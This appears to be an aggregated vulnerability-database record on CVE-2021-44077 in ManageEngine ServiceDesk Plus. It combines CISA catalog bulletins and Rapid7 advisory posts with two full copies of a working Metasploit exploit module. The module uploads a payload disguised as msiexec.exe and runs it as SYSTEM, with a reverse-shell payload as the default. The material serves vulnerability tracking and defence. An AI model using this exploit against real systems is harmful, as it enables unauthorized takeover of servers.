"baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T00:00:00", "type": "cisa", "title": "CISA Adds 13 Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2017-12149", "CVE-2017-17562", "CVE-2019-0193", "CVE-2019-10758", "CVE-2019-13272", "CVE-2019-7238", "CVE-2020-17463", "CVE-2020-8816", "CVE-2021-35394", "CVE-2021-44168", "CVE-2021-44228", "CVE-2021-44515"], "modified": "2022-01-25T00:00:00", "id": "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:09:09", "description": "CISA has added thirteen new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number**\n\n| \n\n**CVE Title**\n\n| \n\n**Remediation Due Date** \n \n---|---|--- \n \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\n| \n\nApache Log4j2 Remote Code Execution Vulnerability\n\n| \n\n12/24/2021 \n \nCVE-2021-44515\n\n| \n\nZoho Corp. Desktop Central Authentication Bypass Vulnerability\n\n| \n\n12/24/2021 \n \nCVE-2021-44168\n\n| \n\nFortinet FortiOS Arbitrary File Download Vulnerability\n\n| \n\n12/24/2021 \n \n[CVE-2021-35394](<https://nvd.nist.gov/vuln/detail/CVE-2021-35394>)\n\n| \n\nRealtek Jungle SDK Remote Code Execution Vulnerability\n\n| \n\n12/24/2021 \n \n[CVE-2020-8816](<https://nvd.nist.gov/vuln/detail/CVE-2020-8816>)\n\n| \n\nPi-Hole AdminLTE Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2020-17463](<https://nvd.nist.gov/vuln/detail/CVE-2020-17463>)\n\n| \n\nFuel CMS SQL Injection Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-7238](<https://nvd.nist.gov/vuln/detail/CVE-2019-7238>)\n\n| \n\nSonatype Nexus Repository Manager Incorrect Access Control Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-13272](<https://nvd.nist.gov/vuln/detail/cve-2019-13272>)\n\n| \n\nLinux Kernel Improper Privilege Management Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-10758](<https://nvd.nist.gov/vuln/detail/CVE-2019-10758>)\n\n| \n\nMongoDB mongo-express Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-0193](<https://nvd.nist.gov/vuln/detail/CVE-2019-0193>)\n\n| \n\nApache Solr DataImportHandler Code Injection Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2017-17562](<https://nvd.nist.gov/vuln/detail/cve-2017-17562>)\n\n| \n\nEmbedthis GoAhead Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2017-12149](<https://nvd.nist.gov/vuln/detail/CVE-2017-12149>)\n\n| \n\nRed Hat Jboss Application Server Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2010-1871](<https://nvd.nist.gov/vuln/detail/CVE-2010-1871>)\n\n| \n\nRed Hat Linux JBoss Seam 2 Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://cyber.dhs.gov/bod/22-01/>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T00:00:00", "type": "cisa", "title": "CISA Adds Thirteen Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2017-12149", "CVE-2017-17562", "CVE-2019-0193", "CVE-2019-10758", "CVE-2019-13272", "CVE-2019-7238", "CVE-2020-17463", "CVE-2020-8816", "CVE-2021-35394", "CVE-2021-44168", "CVE-2021-44228", "CVE-2021-44515"], "modified": "2021-12-10T00:00:00", "id": "CISA:380E63A9EAAD85FA1950A6973017E11B", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-29T09:44:43", "description": "This Metasploit module exploits CVE-2021-44077, an unauthenticated remote code execution vulnerability in ManageEngine ServiceDesk Plus, to upload an EXE (msiexec.exe) and execute it as the SYSTEM account. Note that build 11305 is vulnerable to the authentication bypass but not the file upload. The module will check for an exploitable build.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-28T00:00:00", "type": "zdt", "title": "ManageEngine ServiceDesk Plus Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44077"], "modified": "2021-12-28T00:00:00", "id": "1337DAY-ID-37167", "href": "https://0day.today/exploit/description/37167", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine ServiceDesk Plus CVE-2021-44077',\n 'Description' => %q{\n This module exploits CVE-2021-44077, an unauthenticated remote code\n execution vulnerability in ManageEngine ServiceDesk Plus, to upload an\n EXE (msiexec.exe) and execute it as the SYSTEM account.\n\n Note that build 11305 is vulnerable to the authentication bypass but\n not the file upload. The module will check for an exploitable build.\n },\n 'Author' => [\n # Discovered by unknown threat actors\n 'wvu', # Analysis and exploit\n 'Y4er' # Additional confirmation\n ],\n 'References' => [\n ['CVE', '2021-44077'],\n ['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above'],\n ['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021'],\n ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa21-336a'],\n ['URL', 'https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/'],\n ['URL', 'https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis'],\n ['URL', 'https://xz.aliyun.com/t/10631'] # Y4er's writeup\n ],\n 'DisclosureDate' => '2021-09-16',\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n ['Windows Dropper', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8080,\n 'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians')\n )\n\n unless res\n return CheckCode::Unknown('Target failed to respond to check.')\n end\n\n # NOTE: /RestAPI/ImportTechnicians was removed after build 11303\n unless res.code == 200 && res.get_html_document.at('//form[@name=\"ImportTechnicians\"]')\n return CheckCode::Safe('/RestAPI/ImportTechnicians is not present.')\n end\n\n CheckCode::Appears('/RestAPI/ImportTechnicians is present.')\n end\n\n def exploit\n upload_msiexec\n execute_msiexec\n end\n\n def upload_msiexec\n print_status('Uploading msiexec.exe')\n\n form = Rex::MIME::Message.new\n form.add_part(Faker::Hacker.verb, nil, nil, 'form-data; name=\"step\"')\n form.add_part(generate_payload_exe, 'application/octet-stream', 'binary',\n 'form-data; name=\"theFile\"; filename=\"msiexec.exe\"')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians'),\n 'ctype' => \"multipart/form-data; boundary=#{form.bound}\",\n 'data' => form.to_s\n )\n\n unless res&.code == 401 && res.body.include?('sdp.vulnerability.exceptionerror.title')\n fail_with(Failure::NotVulnerable, 'Failed to upload msiexec.exe')\n end\n\n print_good('Successfully uploaded msiexec.exe')\n end\n\n def execute_msiexec\n print_status('Executing msiexec.exe')\n\n # This endpoint \"won't\" return\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/s247action'),\n 'vars_post' => {\n 'execute' => 's247AgentInstallationProcess'\n }\n }, 0)\n end\n\n # XXX: FileDropper dies a miserable death if the file is in use\n def on_new_session(_session)\n super\n\n # Working directory is C:\\Program Files\\ManageEngine\\ServiceDesk\\site24x7\n print_warning(\"Yo, don't forget to clean up ..\\\\bin\\\\msiexec.exe\")\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/37167", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-10-02T20:14:08", "description": "# Golang-CVE-2021-44077-POC\n\nThis exploit is an unauthenticated ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-29T14:07:54", "type": "githubexploit", "title": "Exploit for Vulnerability in Zohocorp Manageengine Servicedesk Plus", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44077"], "modified": "2022-09-29T14:30:51", "id": "92200053-A0C9-5F1E-AA97-B445DF8E17A4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-01-06T06:46:53", "description": "# CVE-2021-44077\nProof of Concept Exploit for CVE-2021-44077: Pr...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-08T20:24:38", "type": "githubexploit", "title": "Exploit for Vulnerability in Zohocorp Manageengine Servicedesk Plus", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44077"], "modified": "2023-01-06T05:35:51", "id": "1A95BB02-1B5A-5BC5-9B6B-61483A1C1100", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "metasploit": [{"lastseen": "2022-08-19T10:40:37", "description": "This module exploits CVE-2021-44077, an unauthenticated remote code execution vulnerability in ManageEngine ServiceDesk Plus, to upload an EXE (msiexec.exe) and execute it as the SYSTEM account. Note that build 11305 is vulnerable to the authentication bypass but not the file upload. The module will check for an exploitable build.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-23T18:27:57", "type": "metasploit", "title": "ManageEngine ServiceDesk Plus CVE-2021-44077", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44077"], "modified": "2021-12-23T18:27:57", "id": "MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_SERVICEDESK_PLUS_CVE_2021_44077-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine ServiceDesk Plus CVE-2021-44077',\n 'Description' => %q{\n This module exploits CVE-2021-44077, an unauthenticated remote code\n execution vulnerability in ManageEngine ServiceDesk Plus, to upload an\n EXE (msiexec.exe) and execute it as the SYSTEM account.\n\n Note that build 11305 is vulnerable to the authentication bypass but\n not the file upload. The module will check for an exploitable build.\n },\n 'Author' => [\n # Discovered by unknown threat actors\n 'wvu', # Analysis and exploit\n 'Y4er' # Additional confirmation\n ],\n 'References' => [\n ['CVE', '2021-44077'],\n ['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above'],\n ['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021'],\n ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa21-336a'],\n ['URL', 'https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/'],\n ['URL', 'https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis'],\n ['URL', 'https://xz.aliyun.com/t/10631'] # Y4er's writeup\n ],\n 'DisclosureDate' => '2021-09-16',\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n ['Windows Dropper', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8080,\n 'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians')\n )\n\n unless res\n return CheckCode::Unknown('Target failed to respond to check.')\n end\n\n # NOTE: /RestAPI/ImportTechnicians was removed after build 11303\n unless res.code == 200 && res.get_html_document.at('//form[@name=\"ImportTechnicians\"]')\n return CheckCode::Safe('/RestAPI/ImportTechnicians is not present.')\n end\n\n CheckCode::Appears('/RestAPI/ImportTechnicians is present.')\n end\n\n def exploit\n upload_msiexec\n execute_msiexec\n end\n\n def upload_msiexec\n print_status('Uploading msiexec.exe')\n\n form = Rex::MIME::Message.new\n form.add_part(Faker::Hacker.verb, nil, nil, 'form-data; name=\"step\"')\n form.add_part(generate_payload_exe, 'application/octet-stream', 'binary',\n 'form-data; name=\"theFile\"; filename=\"msiexec.exe\"')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians'),\n 'ctype' => \"multipart/form-data; boundary=#{form.bound}\",\n 'data' => form.to_s\n )\n\n unless res&.code == 401 && res.body.include?('sdp.vulnerability.exceptionerror.title')\n fail_with(Failure::NotVulnerable, 'Failed to upload msiexec.exe')\n end\n\n print_good('Successfully uploaded msiexec.exe')\n end\n\n def execute_msiexec\n print_status('Executing msiexec.exe')\n\n # This endpoint \"won't\" return\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/s247action'),\n 'vars_post' => {\n 'execute' => 's247AgentInstallationProcess'\n }\n }, 0)\n end\n\n # XXX: FileDropper dies a miserable death if the file is in use\n def on_new_session(_session)\n super\n\n # Working directory is C:\\Program Files\\ManageEngine\\ServiceDesk\\site24x7\n print_warning(\"Yo, don't forget to clean up ..\\\\bin\\\\msiexec.exe\")\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/manageengine_servicedesk_plus_cve_2021_44077.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-12-09T19:03:47", "description": "CVE | Vendor Advisory | AttackerKB | IVM Content | Patching Urgency | Last Update \n---|---|---|---|---|--- \nCVE-2021-44077 | [Zoho's Advisory](<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021>) | [AttackerKB](<https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis?referrer=blog>) | In Development | Immediately | December 9, 1:30pm ET \n \n## Summary\n\n![Oh No, Zoho: Active Exploitation of CVE-2021-44077 Allowing Unauthenticated Remote Code Execution](https://blog.rapid7.com/content/images/2021/12/zoho-rce.jpg)\n\nZoho customers have had a huge incentive lately to keep their software up to date, as recent Zoho critical vulnerabilities have been weaponized shortly after release by advanced attackers. (Rapid7 blogged as recently as November 9, 2021, about the [Exploitation of Zoho ManageEngine](<https://www.rapid7.com/blog/post/2021/11/09/opportunistic-exploitation-of-zoho-manageengine-and-sitecore-cves/>)). This trend continues with [CVE-2021-44077](<https://nvd.nist.gov/vuln/detail/CVE-2021-44077>), an unauthenticated remote code execution vulnerability affecting several of their products. To assist their customers, Zoho has since set up an online [security response plan](<https://www.manageengine.com/products/service-desk/security-response-plan.html>) that includes an exploit detection tool to see if an organization\u2019s installation is compromised.\n\n## Affected versions:\n\n * ManageEngine ServiceDesk Plus, prior to version 11306\n * ServiceDesk Plus MSP, prior to version 10530\n * SupportCenter Plus, prior to version 11014\n\n## Details\n\nOn September 16, 2021, Zoho released a [Security Advisory](<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above>) urging customers to upgrade their software in order to resolve an authentication bypass vulnerability. 67 days later, on November 22, 2021, they released an [additional advisory](<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021>) for the 44077 CVE indicating that the previously mentioned update also fixed a remote code execution (RCE) vulnerability that is being exploited in the wild.\n\nLast week, CISA released an [alert](<https://us-cert.cisa.gov/ncas/alerts/aa21-336a>) detailing attacker tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs). CVE-2021-44077 has also been added to CISA\u2019s [known exploited vulnerabilities catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) with a required remediation date of December 15, 2021, for US federal agencies.\n\n## Guidance\n\nRapid7 advises organizations that utilize any of the impacted versions listed above patch on an emergency basis, utilize Zoho\u2019s exploit detection tool, and review CISA\u2019s documentation of IOCs to determine whether a specific installation has been compromised. Additionally, we recommend that access to these products should exist behind a VPN and organizations immediately stay up to date on software versions. Attackers have had enough critical vulnerabilities of late to build a bit of a skillset in understanding how the Zoho software works, so future vulnerabilities will only be exploited even faster.\n\n## Rapid7 customers\n\n**InsightVM and Nexpose customers:** \nOur researchers are currently evaluating the feasibility of adding a vulnerability check.\n\n## Updates\n\n[December 9, 2021] \nRapid7 has posted an in-depth technical analysis and PoC of this vulnerability on [AttackerKB](<https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis?referrer=blog>).\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-07T21:41:01", "type": "rapid7blog", "title": "Oh No, Zoho: Active Exploitation of CVE-2021-44077 Allowing Unauthenticated Remote Code Execution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44077"], "modified": "2021-12-07T21:41:01", "id": "RAPID7BLOG:45C740B931E148E6075FD00036A389CB", "href": "https://blog.rapid7.com/2021/12/07/oh-no-zoho-active-exploitation-of-cve-2021-44077-allowing-unauthenticated-remote-code-execution/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-18T15:27:57", "description": "![What's New in InsightVM and Nexpose: Q4 2021 in Review](https://blog.rapid7.com/content/images/2022/02/insightvm-q4.jpg)\n\nGreetings, fellow security professionals. As we enter into the new year, we wanted to provide a recap of product releases and features on the vulnerability management (VM) front for Q4 2021.\n\nLet's start by talking about the elephant in the room. The end of last year was dominated by [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>), the once-in-a-generation security vulnerability that impacted nearly every corner of the security industry and completely ruined every holiday party we were invited to. But as you will see below, in addition to providing you with strong Log4Shell coverage, our VM team has been hard at work on multitudes of other features and capabilities as well.\n\nChief among these are improvements to credential management aspects of scanning, in the form of Scan Assistant, and better Credential Status Reporting. Container scanning is also seeing improved integration of results, as well as enhanced checks leveraging Snyk. Last but not least, email distribution of reports will allow you to better communicate findings across the organization. In other words, Q4 was more than Log4Shell over here, and we're excited to tell you about it.\n\n(Note: Starting this edition, you will see up front a label of [InsightVM] vs [InsightVM & Nexpose] to clarify which product a new feature or capability pertains to)\n\n## [InsightVM & Nexpose] Log4j security content\n\nWhen Log4j hit in early December, our VM teams went into high gear offering solutions and boosting ways InsightVM can identify vulnerable software. Here's a recap of our current [coverage](<https://docs.rapid7.com/insightvm/apache-log4j>):\n\n * Authenticated, generic JAR-based coverage for Windows, macOS, and Unix-like operating systems\n * [Mitigation checks](<https://www.rapid7.com/db/vulnerabilities/apache-log4j-core-jndilookup-mitigated/>) for macOS and Unix-like operating systems\n * Remote check for vulnerable HTTP(S) applications\n * Package-based checks for supported Linux distributions\n * [Coverage](<https://www.rapid7.com/db/vulnerabilities/vcenter-log4j-CVE-2021-44228/>) and [mitigation](<https://www.rapid7.com/db/vulnerabilities/vcenter-log4j-core-vmsa-2021-0028-9-mitigated/>) checks for CVE-2021-44228 and CVE-2021-45046 affecting VMware vCenter Appliances\n * We also added IVM checks to assess CVE-2021-45046 on [VMware Horizon Connection Server](<https://www.rapid7.com/db/vulnerabilities/vmware-horizon-connection-server-cve-2021-45046/>) and [Horizon Agent](<https://www.rapid7.com/db/vulnerabilities/vmware-horizon-agent-cve-2021-45046/>)\n * Authenticated JAR-based checks for follow-on CVEs (CVE-2021-45046, CVE-2021-45105, CVE-2021-44832)\n\n## [InsightVM] Log4j dashboard and Query Builder\n\nWe added a log4j Query Builder query to the Helpful Queries section of Query Builder and a new dashboard template (the Specific Vulnerability Dashboard) designed to 